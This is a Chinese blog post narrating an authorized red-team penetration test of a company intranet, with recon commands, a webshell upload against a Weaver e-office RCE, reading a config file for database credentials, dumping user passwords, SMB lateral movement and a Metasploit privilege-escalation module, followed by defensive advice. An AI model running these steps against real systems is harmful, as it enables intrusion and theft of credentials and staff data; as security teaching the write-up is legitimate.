网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程

知孤云出岫2025-07-25 19:51

目录

    • 一、案例背景
    • 二、目标分析(信息收集阶段)
      • [🌐 外部信息搜集](#🌐 外部信息搜集)
      • [🧠 指纹识别和端口扫描](#🧠 指纹识别和端口扫描)
    • 三、攻击流程(渗透测试全过程)
      • [🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)](#🎯 步骤1:Web漏洞利用 —— 泛微OA远程命令执行漏洞(CVE-2023-2648))
      • [🔍 步骤2:权限维持与横向移动](#🔍 步骤2:权限维持与横向移动)
        • [2.1 获取本地密码信息](#2.1 获取本地密码信息)
        • [2.2 利用数据库读取其他管理员账号密码(Base64加密)](#2.2 利用数据库读取其他管理员账号密码(Base64加密))
        • [2.3 横向移动尝试:](#2.3 横向移动尝试:)
      • [🧠 步骤3:提权(本地提权)](#🧠 步骤3:提权(本地提权))
        • [漏洞利用:CVE-2016-0099(Windows Kernel 提权)](#漏洞利用:CVE-2016-0099(Windows Kernel 提权))
    • 四、攻击成果与影响
    • 五、防御建议
    • 六、关键使用工具列表

一、案例背景

  • 目标系统:某企业内部信息管理平台(Web系统 + 内网资源)

  • 测试授权:企业授权渗透测试,属于红队演练

  • 测试目的

    • 评估目标系统外部攻击面
    • 验证内网隔离和身份访问机制的安全性
    • 检测存在的高危漏洞

二、目标分析(信息收集阶段)

🌐 外部信息搜集

  • 使用工具:whoisnslookuptheHarvester

  • 收集内容:

    • 公司域名信息
    • 邮箱格式
    • 员工姓名/社交信息
    • 公布的IP段

🧠 指纹识别和端口扫描

  • 工具:nmap + whatweb + FOFA + Shodan

  • 发现信息:

    • 开放端口:80、443、21、22、445
    • 存在一台OA系统(泛微e-office)
bash 复制代码 
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip

三、攻击流程(渗透测试全过程)

🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)

  • 漏洞描述:某版本的e-office存在未授权RCE
  • 攻击方式:构造特定POST请求执行系统命令
bash 复制代码 
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data

file=@payload.jsp
  • 效果:上传webshell成功,获得Web权限

✅ 权限:www用户权限,进入Web目录

🔍 步骤2:权限维持与横向移动

2.1 获取本地密码信息
bash 复制代码 
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
  • 拿到数据库密码 dbuser / dbpass,进一步连接数据库后台。
2.2 利用数据库读取其他管理员账号密码(Base64加密)
sql 复制代码 
SELECT username, password FROM user_table;
  • 解密后成功获得admin账号登录后台权限。
2.3 横向移动尝试:
  • 内网扫描工具:netstatarp -anmap -sP
  • 工具:msf, CrackMapExec, Impacket, smbclient
bash 复制代码 
smbclient //192.168.1.100/share -U "admin"
  • 发现另一台文件服务器开放smb,尝试连接并获取敏感文档。

🧠 步骤3:提权(本地提权)

  • 目标主机系统:Windows Server 2012 R2
  • 工具:WinPEAS, Sherlock, MSF local_exploit_suggester
漏洞利用:CVE-2016-0099(Windows Kernel 提权)
  • 使用Metasploit进行自动化提权:
bash 复制代码 
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
  • 成功提权为System权限

四、攻击成果与影响

项目 结果
拿到webshell
获取数据库访问权限
获得OA系统管理员账户
横向入侵到文件服务器
成功提权为System权限
发现大量员工身份证件、薪资文档等敏感资料

五、防御建议

安全措施 建议内容
漏洞修补 尽快升级泛微e-office系统,打补丁
Web防护 WAF防护上传接口,过滤执行脚本
内网隔离 文件服务器应设置访问策略,不应开放匿名访问
权限控制 最小权限原则,限制System提权条件
日志审计 启用webshell行为监控与文件上传审计
应急响应 建立SOC联动机制,实现告警联动

六、关键使用工具列表

类型 工具名称 用途
信息收集 nmap, whatweb, FOFA 扫描与指纹识别
Web攻击 Burp Suite, curl, sqlmap 注入与漏洞利用
提权工具 WinPEAS, Metasploit 本地提权
横向移动 CrackMapExec, Impacket SMB、NTLM中继
后门控制 msfconsole, Behinder 维持访问通道
相关推荐
Aphasia31114 小时前
VPN 与内网穿透
安全
Mr_愚人派2 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao2 天前
【无标题】
人工智能·安全
Alsn862 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院2 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
treesforest2 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安2 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
开发小能手-roy2 天前
StringBuilder vs StringBuffer:2024年还需要线程安全字符串吗?
开发语言·python·安全
上海云盾第一敬业销售2 天前
深入解析WAF的工作原理与机制
web安全·ddos
_阿伟_2 天前
JWT介绍
安全
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点062026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?07AI科技热点日报 | 2026年6月1日08Codex 下载安装指南:Windows 和 macOS 官方版下载09上线仅72小时被强制下架:Claude Fable 5 的短命10AI一周事件 · 2026-06-03 至 2026-06-09